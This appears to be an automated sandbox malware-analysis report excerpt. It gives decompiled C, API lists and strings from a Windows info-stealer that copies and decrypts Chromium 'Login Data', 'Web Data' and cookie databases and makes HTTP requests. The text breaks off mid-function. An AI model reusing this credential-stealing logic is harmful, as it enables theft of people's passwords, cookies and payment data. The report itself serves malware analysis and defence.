0x004081fb
0x004081fe
0x00408202
0x00408205
0x0040820a
0x0040820c
0x00408212
0x00408225
0x00408229
0x0040822b
0x0040822b
0x00408230
0x00408230
0x00408212
0x0040823a
0x0040823f
0x0040823f
0x00408249
0x0040824e
0x00408257
0x00408257
0x00408260
0x00408266
0x00408269
0x00408269
0x00408272
0x00000000
0x00408272
0x004080be
0x004080bf
0x004080c0
0x004080c1
0x004080c2
0x004080c4
0x004080c7
0x004080c8
0x004080d1
0x004080ff
0x00408104
0x00408106
0x0040810e
0x0040810f
0x00408116
0x0040811c
0x0040811c
0x00408116
0x00000000
0x00408104
0x004080d6
0x004080dd
0x004080e4
0x004080ed
0x00000000
0x00407fa8
0x00407fa8
0x00407fab
0x00407fae
0x00407fb0
0x00407fb3
0x00407fb8
0x00407fc0
0x00407fc2
0x00407fcb
0x00407fd0
0x00407fd8
0x00407fdd
0x00407ffa
0x00407fff
0x00408007
0x0040800c
0x00408014
0x00408019
0x00408021
0x00408026
0x00408038
0x0040803d
0x00408045
0x0040804b
0x0040804d
0x00408053
0x00408053
0x00408057
0x00408057
0x00408060
0x00408063
0x00408066
0x00000000
0x00408066
0x00407f68
0x00407f68
0x00407f6a
0x00407f6a
0x00407f6b
0x00407f6f
0x00407f72
0x00407f76
0x00000000
0x00407f6a
0x00407f66

APIs

LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408092
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080A8
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408225
CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
HttpOpenRequestW.WININET(00000000,?,00000000,00000000,00409B89,00C00000,00000001), ref: 00408396
HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
InternetCloseHandle.WININET(?), ref: 004083ED
InternetCloseHandle.WININET(00000000), ref: 004083F9
InternetCloseHandle.WININET(00000000), ref: 00408400
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
LocalFree.KERNELBASE(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487

Strings

XcP, xrefs: 00407FDD
[N, xrefs: 00407FD0, 00407FFF, 00408019, 00408026, 0040803D
/, xrefs: 00407F51
rqwrwqrqwrqw, xrefs: 004082FD

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Internet$AllocCloseHandle$ByteCharFileHttpMultiOptionRequestWide$DeleteOpenReadSendlstrcpyn
String ID: [N$/$XcP$rqwrwqrqwrqw
API String ID: 1267997246-1660138868
Opcode ID: aafd5879307a66afce12fd9e369e4241c6591ad45258ee02a5c42afa5d3d6cc8
Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
Opcode Fuzzy Hash: aafd5879307a66afce12fd9e369e4241c6591ad45258ee02a5c42afa5d3d6cc8
Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8 Relevance: 51.2, APIs: 25, Strings: 4, Instructions: 419
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v80;
				void* _v84;
				char _v88;
				void* _t103;
				void* _t104;
				void* _t115;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				void* _t134;
				void* _t135;
				void* _t137;
				int _t142;
				void* _t144;
				void* _t146;
				void* _t153;
				void* _t154;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t160;
				void* _t161;
				WCHAR* _t165;
				void* _t173;
				void* _t174;
				int _t175;
				void* _t184;
				int _t185;
				void* _t190;
				void* _t199;
				intOrPtr* _t203;
				void* _t204;
				intOrPtr* _t205;
				void* _t253;
				signed int _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				char _t261;
				void* _t263;
				void* _t265;
				signed int _t266;
				void* _t267;
				intOrPtr* _t270;
				void* _t271;

				_t203 = __edx;
				_v44 = __ecx;
				_t103 = LocalAlloc(0x40, 0x400); // executed
				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
				_v8 = _v8 & 0x00000000;
				_t253 = _t104;
				E004017FA(_t253,  &_v8,  &_v52);
				 *_t270 = 0x200;
				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v48 = _t259;
				E00401934(_v8,  &_v48,  *0x40e044, _v52);
				_v28 = _v28 & 0x00000000;
				_v60 = _t259;
				_v64 = 0x200;
				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t260;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				_t115 =  *((intOrPtr*)( *0x40e0b0))( &_v64,  &_v28, 0, 0, 0, 0,  &_v72); // executed
				if(_t115 != 0) {
					_t199 = E0040177F(_v68,  &_v24, _v72);
					_t260 = _v24;
					if(_t199 != 0) {
						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v60 != 0) {
					LocalFree(_v60);
				}
				if(_v68 != 0) {
					LocalFree(_v68);
				}
				if(_t260 != 0) {
					LocalFree(_t260);
				}
				if(_t253 != 0) {
					LocalFree(_t253);
				}
				_t261 = _a16;
				if(_t261 == 0) {
					L57:
					return 0;
				} else {
					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
					 *0x40e4d4 = _t118;
					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
					 *0x40e4c8 = _t120;
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
					 *0x40e4bc = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
					 *0x40e4c4 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
					 *0x40e4cc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
					 *0x40e4b8 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
					 *0x40e4c0 = _t130;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t135;
					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
					_v56 = _t263;
					_t137 = E0040A69E( *0x40e000,  &_v32);
					_t204 = _v32;
					if(_t137 == 0) {
						L59:
						LocalFree(_t263);
						DeleteFileW(_t204);
						return LocalFree(_t204) | 0xffffffff;
					}
					_t142 = CopyFileW(_t263, _t204, 0); // executed
					if(_t142 == 0) {
						goto L59;
					}
					_t144 =  *0x40e4c8(_t204,  &_v24); // executed
					if(_t144 == 0) {
						if(_v24 != 0) {
							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0); // executed
							_t271 = _t270 + 0x14;
							if(_t146 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t263 != 0) {
										LocalFree(_t263);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24); // executed
									DeleteFileW(_t204); // executed
									if(_t204 != 0) {
										LocalFree(_t204);
									}
									goto L57;
								}
								_t205 = _v44;
								do {
									_t153 =  *0x40e4c0(_a16, 0);
									_t154 =  *0x40e4c0(_a16, 1);
									_v48 = _t154;
									_t155 =  *0x40e4c0(_a16, 2);
									_t271 = _t271 + 0x18;
									_t255 = _t155;
									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
										_t157 =  *0x40e4b8(_a16, 0);
										_v44 = _t157;
										_t158 =  *0x40e4b8(_a16, 1);
										_t271 = _t271 + 0x10;
										_v40 = _t158;
										if(_t255 <= 0) {
											goto L51;
										}
										_t265 =  *0x40e4d0(_a16, 2);
										_t54 = _t255 + 0x40; // 0x40
										_v36 = _t265;
										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
										_v48 = _t161;
										_v12 =  *_t161;
										_v11 =  *((intOrPtr*)(_t161 + 1));
										_v10 =  *((intOrPtr*)(_t161 + 2));
										_v9 = 0;
										if(_t265 == 0) {
											L50:
											LocalFree(_t161);
											goto L51;
										}
										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
										_t165 =  *0x40e1a4; // 0x4fd7a0
										_v20 = _t165;
										_push("v10");
										_push( &_v12);
										_v8 = _t266;
										if( *((intOrPtr*)( *0x40e084))() != 0) {
											_push( &_v80);
											_v84 = _v36;
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_v88 = 0x200;
											_push( &_v88);
											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
												_t267 = _v8;
												L47:
												if(_t267 != 0) {
													LocalFree(_t267);
												}
												_t161 = _v48;
												goto L50;
											}
											 *((char*)(_v80 + _v76)) = 0;
											_t173 = E0040A4C2(_v76);
											_v36 = _t173;
											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
											_t271 = _t271 + 0x14;
											_t175 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t174 >= _t175) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
											if(_v76 != 0) {
												LocalFree(_v76);
											}
											LocalFree(_v36);
											L39:
											goto L47;
										}
										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
										if(E0040177F(_v36,  &_v16, _t255) == 0) {
											_t267 = _v8;
										} else {
											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
											_t271 = _t271 + 0x14;
											_t185 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t184 >= _t185) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
										}
										if(_v16 == 0) {
											goto L47;
										} else {
											LocalFree(_v16);
											goto L39;
										}
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t204 = _v32;
								_t263 = _v56;
								goto L53;
							}
							LocalFree(_t263);
							LocalFree(_t204);
							 *0x40e4c4(_v24);
							_t190 = 0xfffffffd;
							return _t190;
						}
						_t258 = 0xfffffffe;
						L22:
						LocalFree(_t263);
						LocalFree(_t204);
						return _t258;
					}
					_t258 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x004027cd
0x004027cf
0x004027d2
0x004027de
0x004027e0
0x004027e7
0x004027ef
0x004027fa
0x00402808
0x00402811
0x00402814
0x0040281e
0x0040282b
0x0040282e
0x0040283b
0x0040283d
0x00402840
0x00402845
0x00402845
0x00402863
0x00402867
0x00402872
0x00402877
0x0040287d
0x00402889
0x00402889
0x0040287d
0x0040288f
0x00402894
0x00402894
0x0040289e
0x004028a3
0x004028a3
0x004028ad
0x004028b2
0x004028b2
0x004028ba
0x004028bd
0x004028bd
0x004028c5
0x004028c8
0x004028c8
0x004028ce
0x004028d3
0x00402c97
0x00000000
0x004028d9
0x004028e5
0x004028ed
0x004028f8
0x00402900
0x0040290b
0x00402913
0x0040291e
0x00402926
0x00402931
0x00402939
0x00402944
0x0040294c
0x00402957
0x0040295f
0x00402971
0x0040297e
0x0040298b
0x0040299b
0x004029a1
0x004029a6
0x004029a9
0x004029ae
0x004029b3
0x00402c9e
0x00402c9f
0x00402ca6
0x00000000
0x00402cb3
0x004029c3
0x004029c7
0x00000000
0x00000000
0x004029d2
0x004029dc
0x004029e7
0x00402a12
0x00402a18
0x00402a1d
0x00402a3f
0x00402a4c
0x00402c66
0x00402c68
0x00402c6b
0x00402c6b
0x00402c74
0x00402c7d
0x00402c86
0x00402c8e
0x00402c91
0x00402c91
0x00000000
0x00402c8e
0x00402a52
0x00402a55
0x00402a5a
0x00402a67
0x00402a72
0x00402a75
0x00402a7b
0x00402a7e
0x00402a83
0x00402a9d
0x00402aa8
0x00402aab
0x00402ab1
0x00402ab4
0x00402ab9
0x00000000
0x00000000
0x00402ad0
0x00402ad4
0x00402ad7
0x00402add
0x00402ae7
0x00402ae9
0x00402aee
0x00402af4
0x00402afa
0x00402afd
0x00402b03
0x00402c46
0x00402c47
0x00000000
0x00402c47
0x00402b1d
0x00402b1f
0x00402b24
0x00402b2a
0x00402b2f
0x00402b30
0x00402b37
0x00402bb6
0x00402bb9
0x00402bc1
0x00402bc2
0x00402bc3
0x00402bc4
0x00402bc5
0x00402bc9
0x00402bd0
0x00402bd5
0x00402c35
0x00402c38
0x00402c3a
0x00402c3d
0x00402c3d
0x00402c43
0x00000000
0x00402c43
0x00402bdd
0x00402be1
0x00402bf6
0x00402c00
0x00402c02
0x00402c0a
0x00402c0e
0x00402c11
0x00402c1c
0x00402c1c
0x00402c22
0x00402c27
0x00402c27
0x00402ba5
0x00402ba5
0x00000000
0x00402ba5
0x00402b50
0x00402b5b
0x00402b95
0x00402b5d
0x00402b75
0x00402b77
0x00402b7f
0x00402b83
0x00402b86
0x00402b91
0x00402b91
0x00402b86
0x00402b9c
0x00000000
0x00402ba2
0x00402ba5
0x00000000
0x00402ba5
0x00402b9c
0x00402c4d
0x00402c4d
0x00402c57
0x00402c60
0x00402c63
0x00000000
0x00402c63
0x00402a20
0x00402a27
0x00402a30
0x00402a39
0x00000000
0x00402a39
0x004029eb
0x004029ec
0x004029ed
0x004029f4
0x00000000
0x004029fa
0x004029de
0x00000000
0x004029de

APIs

LocalAlloc.KERNEL32(00000040,00000400,?,?,00000000), ref: 004027D2
LocalFree.KERNEL32(00000000), ref: 00402845

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402863
LocalFree.KERNEL32(00000000), ref: 00402894
LocalFree.KERNEL32(00000000), ref: 004028A3
LocalFree.KERNEL32(00000000), ref: 004028B2
LocalFree.KERNEL32(00000000), ref: 004028BD
LocalFree.KERNEL32(00000000), ref: 004028C8
CopyFileW.KERNEL32(00000000,?,00000000), ref: 004029C3
LocalFree.KERNEL32(00000000), ref: 004029ED
LocalFree.KERNEL32(?), ref: 004029F4
LocalFree.KERNEL32(00000000), ref: 00402A20
LocalFree.KERNEL32(?), ref: 00402A27
LocalFree.KERNEL32(00000000), ref: 00402C9F
DeleteFileW.KERNEL32(?), ref: 00402CA6
LocalFree.KERNEL32(?), ref: 00402CAD

Strings

Login Data, xrefs: 00402993
`WN, xrefs: 00402933
v10, xrefs: 00402B2A
YN, xrefs: 004028D9

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$File$AllocCopyCryptDataDeleteUnprotect
String ID: Login Data$`WN$v10$YN
API String ID: 2012866857-1650609049
Opcode ID: e331a75e1731fd4ecb6253aaf8f91baeb70ae3a90a543f5c9c81847e5ae278c2
Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
Opcode Fuzzy Hash: e331a75e1731fd4ecb6253aaf8f91baeb70ae3a90a543f5c9c81847e5ae278c2
Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402CB8 Relevance: 49.4, APIs: 21, Strings: 7, Instructions: 440
filestringencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalFree.KERNEL32(00000000), ref: 00402D47

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402D65
StrCpyW.SHLWAPI(?,?), ref: 00402D87
LocalFree.KERNEL32(00000000), ref: 00402D92
LocalFree.KERNEL32(00000000), ref: 00402DA1
LocalFree.KERNEL32(00000000), ref: 00402DB0
LocalFree.KERNEL32(00000000), ref: 00402DBF
LocalFree.KERNEL32(00000000), ref: 00402DCA
CopyFileW.KERNEL32(00000000,?,00000000), ref: 00402EE2
DeleteFileW.KERNEL32(?), ref: 00402F30
LocalFree.KERNEL32(?), ref: 00402F37
LocalFree.KERNEL32(00000000), ref: 00402F4F
wsprintfW.USER32 ref: 00403102
lstrlenW.KERNEL32(00000000), ref: 0040310C
wsprintfW.USER32 ref: 004031A6
lstrlenW.KERNEL32(00000000), ref: 004031B0
LocalFree.KERNEL32(00000000), ref: 004031CB
LocalFree.KERNEL32(?), ref: 004031D4
LocalFree.KERNEL32(00000000), ref: 004031E2
LocalFree.KERNEL32(00000000), ref: 004031EC
DeleteFileW.KERNEL32(?), ref: 00403223

Strings

`WN, xrefs: 00402E75
FALSE, xrefs: 004030E5, 00403191
v10, xrefs: 0040308D
Cookies, xrefs: 00402DE9
YN, xrefs: 00402E11
TRUE, xrefs: 004030EA, 004030F5, 0040318C, 00403199
Network\Cookies, xrefs: 00402DE0

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$Deletelstrlenwsprintf$CopyCryptDataUnprotect
String ID: Cookies$FALSE$Network\Cookies$TRUE$`WN$v10$YN
API String ID: 1042736561-2114278409
Opcode ID: cb4b49c8d858d8dc12969dc26ee80fe5395de1f12ccb40e4059484e4599b5c3f
Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
Opcode Fuzzy Hash: cb4b49c8d858d8dc12969dc26ee80fe5395de1f12ccb40e4059484e4599b5c3f
Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00403236 Relevance: 45.9, APIs: 24, Strings: 2, Instructions: 437
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00403236(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				void* _v52;
				char _v56;
				void* _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				void* _t107;
				void* _t108;
				void* _t119;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t138;
				void* _t139;
				void* _t141;
				int _t146;
				void* _t148;
				void* _t150;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t160;
				void* _t161;
				void* _t167;
				void* _t168;
				WCHAR* _t172;
				signed int _t179;
				void* _t180;
				int _t181;
				void* _t190;
				int _t191;
				void* _t196;
				void* _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr* _t211;
				void* _t265;
				void* _t268;
				intOrPtr _t269;
				void* _t273;
				void* _t274;
				void* _t275;
				char _t276;
				void* _t278;
				signed int _t279;
				signed int _t280;
				void* _t281;
				intOrPtr* _t284;
				void* _t285;

				_t209 = __edx;
				_v48 = __ecx;
				_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_t108 =  *((intOrPtr*)( *0x40e13c))(_t107, _a12);
				_v8 = _v8 & 0x00000000;
				_t265 = _t108;
				E004017FA(_t265,  &_v8,  &_v56);
				 *_t284 = 0x200;
				_t274 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v52 = _t274;
				E00401934(_v8,  &_v52,  *0x40e044, _v56);
				_v28 = _v28 & 0x00000000;
				_v64 = _t274;
				_v68 = 0x200;
				_t275 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t275;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				_t119 =  *((intOrPtr*)( *0x40e0b0))( &_v68,  &_v28, 0, 0, 0, 0,  &_v76); // executed
				if(_t119 != 0) {
					_t205 = E0040177F(_v72,  &_v24, _v76);
					_t275 = _v24;
					if(_t205 != 0) {
						 *_t209 =  *((intOrPtr*)( *0x40e13c))( *_t209, _t275);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v64 != 0) {
					LocalFree(_v64);
				}
				if(_v72 != 0) {
					LocalFree(_v72);
				}
				if(_t275 != 0) {
					LocalFree(_t275);
				}
				if(_t265 != 0) {
					LocalFree(_t265);
				}
				_t276 = _a16;
				if(_t276 == 0) {
					L57:
					return 0;
				} else {
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c4);
					 *0x40e4d4 = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1f8);
					 *0x40e4c8 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1e0);
					 *0x40e4bc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e208);
					 *0x40e4c4 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e230);
					 *0x40e4cc = _t130;
					_t132 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1c0);
					 *0x40e4b8 = _t132;
					_t134 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e224);
					 *0x40e4c0 = _t134;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t276,  *0x40e1b0);
					_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t139 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t139;
					_t278 =  *((intOrPtr*)( *0x40e000))(_t138, _a8, L"Web Data");
					_v60 = _t278;
					_t141 = E0040A69E( *0x40e000,  &_v32);
					_t210 = _v32;
					if(_t141 == 0) {
						L59:
						LocalFree(_t278);
						DeleteFileW(_t210);
						return LocalFree(_t210) | 0xffffffff;
					}
					_t146 = CopyFileW(_t278, _t210, 0); // executed
					if(_t146 == 0) {
						goto L59;
					}
					_t148 =  *0x40e4c8(_t210,  &_v24); // executed
					if(_t148 == 0) {
						if(_v24 != 0) {
							_t150 =  *0x40e4d4(_v24,  *0x40e1d4, 0xffffffff,  &_a16, 0); // executed
							_t285 = _t284 + 0x14;
							if(_t150 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t278 != 0) {
										LocalFree(_t278);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24); // executed
									DeleteFileW(_t210); // executed
									if(_t210 != 0) {
										LocalFree(_t210);
									}
									goto L57;
								}
								_t211 = _v48;
								_t268 = 1;
								do {
									_t157 =  *0x40e4b8(_a16, 0);
									_v48 = _t157;
									_t158 =  *0x40e4b8(_a16, 2);
									_v44 = _t158;
									_t159 =  *0x40e4b8(_a16, 3);
									_v40 = _t159;
									_t160 =  *0x40e4c0(_a16, _t268);
									_t279 = _t160;
									_v36 = _t279;
									_t161 =  *0x40e4c0(_a16, 0);
									_t285 = _t285 + 0x28;
									if(_t161 < _t268) {
										goto L51;
									}
									_push(_t268);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_push(2);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_push(3);
									_push(_a16);
									if( *0x40e4c0() < _t268) {
										goto L51;
									}
									_t269 =  *0x40e4d0(_a16, _t268);
									_t57 = _t279 + 0x40; // 0x40
									_t167 =  *((intOrPtr*)( *0x40e044))(0x40, _t57);
									_t168 =  *((intOrPtr*)( *0x40e050))(_t167, _t269);
									_v52 = _t168;
									_v12 =  *_t168;
									_v11 =  *((intOrPtr*)(_t168 + 1));
									_v10 =  *((intOrPtr*)(_t168 + 2));
									_v9 = 0;
									if(_t269 == 0) {
										L50:
										LocalFree(_t168);
										_t268 = 1;
										goto L51;
									}
									_t280 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
									_t172 =  *0x40e1c8; // 0x4fdc60
									_v20 = _t172;
									_push("v10");
									_push( &_v12);
									_v8 = _t280;
									if( *((intOrPtr*)( *0x40e084))() != 0) {
										_push( &_v84);
										_v88 = _t269;
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_v92 = 0x200;
										_push( &_v92);
										if( *((intOrPtr*)( *0x40e0b0))() == 0) {
											_t281 = _v8;
											L47:
											if(_t281 != 0) {
												LocalFree(_t281);
											}
											_t168 = _v52;
											goto L50;
										}
										 *((char*)(_v84 + _v80)) = 0;
										_t179 = E0040A4C2(_v80);
										_v36 = _t179;
										_t180 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _t179, _v48, _v44, _v40);
										_t285 = _t285 + 0x18;
										_t181 = lstrlenW(_v20);
										_t281 = _v8;
										if(_t180 >= _t181) {
											 *_t211 = E0040A503( *_t211, _t281);
										}
										if(_v80 != 0) {
											LocalFree(_v80);
										}
										LocalFree(_v36);
										L39:
										goto L47;
									}
									_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _v36 << 2);
									if(E0040177F(_t269,  &_v16, _v36) == 0) {
										_t281 = _v8;
									} else {
										_t190 =  *((intOrPtr*)( *0x40e0ec))(_t280, _v20, _v16, _v48, _v44, _v40);
										_t285 = _t285 + 0x18;
										_t191 = lstrlenW(_v20);
										_t281 = _v8;
										if(_t190 >= _t191) {
											 *_t211 = E0040A503( *_t211, _t281);
										}
									}
									if(_v16 == 0) {
										goto L47;
									} else {
										LocalFree(_v16);
										goto L39;
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t210 = _v32;
								_t278 = _v60;
								goto L53;
							}
							LocalFree(_t278);
							LocalFree(_t210);
							 *0x40e4c4(_v24);
